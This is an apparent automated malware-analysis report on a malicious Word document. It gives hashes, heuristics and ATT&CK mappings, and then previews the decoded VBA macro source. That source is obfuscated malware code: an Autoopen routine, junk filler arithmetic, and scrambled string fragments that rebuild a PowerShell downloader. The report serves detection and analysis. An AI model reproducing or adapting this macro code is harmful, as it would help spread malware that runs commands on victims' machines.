Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6beac24533618207…

MALICIOUS

Office (OLE)

148.0 KB Created: 2018-05-15 18:33:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: b326b14d89ef0c0b3a99887b821e9266 SHA-1: c053af0404dcbcb12dacd9d25282895bf18f4c9f SHA-256: 6beac24533618207050fa04ad0eb9e28dec117b0dd5418ac58614c1862931bf4
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. The critical heuristic firing indicates the presence of a Shell() call within the VBA code, which is commonly used to execute arbitrary commands or download and run additional payloads. The AutoOpen macro further suggests an attempt at immediate execution upon opening the document. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 118087 bytes
SHA-256: 36bd199c6b429ed4d5494b53cdc82f90d6495a84b8223f71dc6a88e44a0b27c2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "qIsjsUf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub GzZBl(wLBst)
GormpC = RPAUdW
tHWHqD = dKppzT
URRSod = KzTNwS + Sgn(77525 - FdviK - ppuCp + Fix(87227)) - 55766 - CDbl(58107)
wpiMw = 95569
End Sub
Sub BpsfjJ(urlzV)
MuVJL = cXQzkT
vWYPFr = WbGli
jnzKDt = ZpCTY + Sgn(476 - VLlpI - CNfWb + Fix(61625)) - 15119 - CDbl(21753)
knjiYz = 78759
FwqLG = UEqFa
LqQdTk = HdjXm
rFOjtb = jnjtR + Sgn(237 - HLRlah - WuXGL + Fix(78413)) - 62716 - CDbl(64386)
WYEPPA = 10698
wiIIY = WLSoL
MwwEZV = qdiml
tKUNkh = FwowZ + Sgn(28090 - jBvsAV - hYcAqt + Fix(80045)) - 28236 - CDbl(83708)
rXIfA = 2860
End Sub
Sub iHEqPJ(fKXbp)
plQNLl = NunQrF
EBFSj = zKtQvS
bUfWO = JZFGu + Sgn(38943 - IkoTo - KkwdEF + Fix(84367)) - 79666 - CDbl(70500)
szSsXR = 85701
RCRvA = uKwVrM
ZcwIi = raRWjZ
NHcbqr = aClhOk + Sgn(96320 - uGWwYJ - XWktl + Fix(2659)) - 76846 - CDbl(487)
iWFkni = 43703
End Sub
Sub Autoopen()
On Error Resume Next
zTvXqO = thIjKz
AlvjFr = FqmCFz
iNuLks = ENuhHq + Sgn(99597 - sHqjw - UpEdf + Fix(64052)) - 87055 - CDbl(55549)
VlPCP = 37777
sOBlwwww (UaHmw + AHmRQqZDIRTn + ACzAz)
wiMYC = KYpiE
FbEZv = nklimP
KZwoC = ijsiiJ + Sgn(24836 - jEvYm - wjUTb + Fix(12275)) - 10129 - CDbl(24892)
PTrwz = 85758
End Sub
Sub OjnDZa(zZPif)
jpGAu = dFcMwa
XcKnN = UlqMk
vVSXuM = ZFjaN + Sgn(83450 - WPqlW - dHDlmm + Fix(3798)) - 40930 - CDbl(21650)
qdVRw = 13411
iiAYA = rBzvL
FuEptG = RhkIKC
jqwsa = PEHDW + Sgn(36029 - vMjpqq - GblobL + Fix(20222)) - 78838 - CDbl(56170)
aqWlcA = 10088
VIaAm = TadsF
vRTXII = IQOsa
KdfwqT = ikUiD + Sgn(10376 - kVBhSj - BIWwdT + Fix(93339)) - 94033 - CDbl(77919)
PAZcY = 75676
End Sub
Sub mYtTKw(UDUUnP)
arvIUJ = NzPhwO
DfLLh = vtpMr
kiazc = ZZpId + Sgn(37975 - djZYi - OiTQXI + Fix(15901)) - 10655 - CDbl(85306)
jBjRIZ = 37486
End Sub

Attribute VB_Name = "AmXWpduCsHEq"
Sub VLacd(NDrUE)
nIHtCv = MmYrO
tpVUQA = BQLqJ
iIFjIS = pBVnI + Sgn(80668 - zdjwT - kkbri + Fix(51433)) - 38116 - CDbl(4924)
WzRjMQ = 92658
End Sub
Function AHmRQqZDIRTn()
On Error Resume Next
DPZuC = UiLanB
hPWzF = jNAiwR
fYVYd = DWjjuR + Sgn(65127 - GJWAjA - phumH + Fix(42649)) - 29507 - CDbl(87767)
hadrM = 93196
MvYsTi = jdPKZ
LWMvR = ibFdjz
nASUS = NSPRHj + Sgn(64632 - YZjsR - zGGEL + Fix(74897)) - 81778 - CDbl(63552)
GSrvL = 82842
IFBwIFzDm = mjTjPa("5QqZz:p'+'tth@/s5'+'5q'+'Jm/ed'+'.zlas-'+'vdejE", 24806 + 3 - 24806, 24806 + 40 - 24806)
QJwhM = vFEMkq
BYlOl = htOIj
jvIzPn = LOIXv + Sgn(70274 - AKBzzC - aVihdJ + Fix(5802)) - 19210 - CDbl(31654)
AQufD = 74763
XNaSj = jtTLGH
uqooEi = Dlpaj
wnCiT = PmWPT + Sgn(39741 - REZqmq - BtciJo + Fix(83178)) - 54867 - CDbl(7413)
YzjYtv = 81589
luNsJXMmMEW = mjTjPa("7I7]rAHc[+38]rAHc[(  EcALPErc-)'}}{h'S2z,", 11607 + 5 - 11607, 11607 + 35 - 11607)
srstYa = UHQGd
DjlGFL = ViXmj
rUlYYJ = BuzFHV + Sgn(2620 - phbWa - VPzRnj + Fix(41246)) - 37186 - CDbl(26299)
FKojA = 67106
vPJKu = EQLWdC
pkZjR = jRNSJz
DDVXo = WfOLw + Sgn(42739 - TniOb - obDZAn + Fix(41667)) - 64132 - CDbl(37674)
hzzNVj = 2463
nipwBsDWP = mjTjPa("OBoc))93]rAHc[,)47]rAHc[+35]rAHc[+94]rAHc[(ecaLper-29]rAHc[,'fsoDADsc", 66983 + 6 - 66983, 66983 + 60 - 66983)
nhEfVa = dNLjt
zraIwA = UkTrCw
OwIlnm = atfJGd + Sgn(563 - aKBav - GZEXjW + Fix(52033)) - 6462 - CDbl(28614)
cYsKj = 8375
idYwj = qojWZ
cvHpD = VXEWGi
qPDBQA = nURXuc + Sgn(73920 - vzaRz - hNiKo + Fix(24788)) - 25823 - CDbl(51549)
IXqLp = 89647
FUuucaUiiu = mjTjPa("hF+'cta'+'c}'+';k'+'a'+'erb;)'+'C'+'DSAk4()'+'J51'+'me'+'tI-eJ51+J51kJ51+'+'J5'+'1ovnIJ51(&'+';)CDS'+'A'+'k4 ,'+')(DN'+'SgN5ZPi5'+'Z'+'PrtSoTDNS3%73", 49734 + 5 - 49734, 49734 + 142 - 49734)
nPVwjH = jvbzVb
vojbJ = VrcoP
CJAER = FILKwC + Sgn(53343 - iwPNN - zMMjHj + Fix(61883)) - 85966 - CDbl(32159)
nhhXFV = 68875
VzUnz = zJKuEp
dbXZFp = OOpjT
QOpQct = sYfSP + Sgn(52465 - QTBALR - ajtUb + Fix(62786)) - 18079 - CDbl(21600
... (truncated)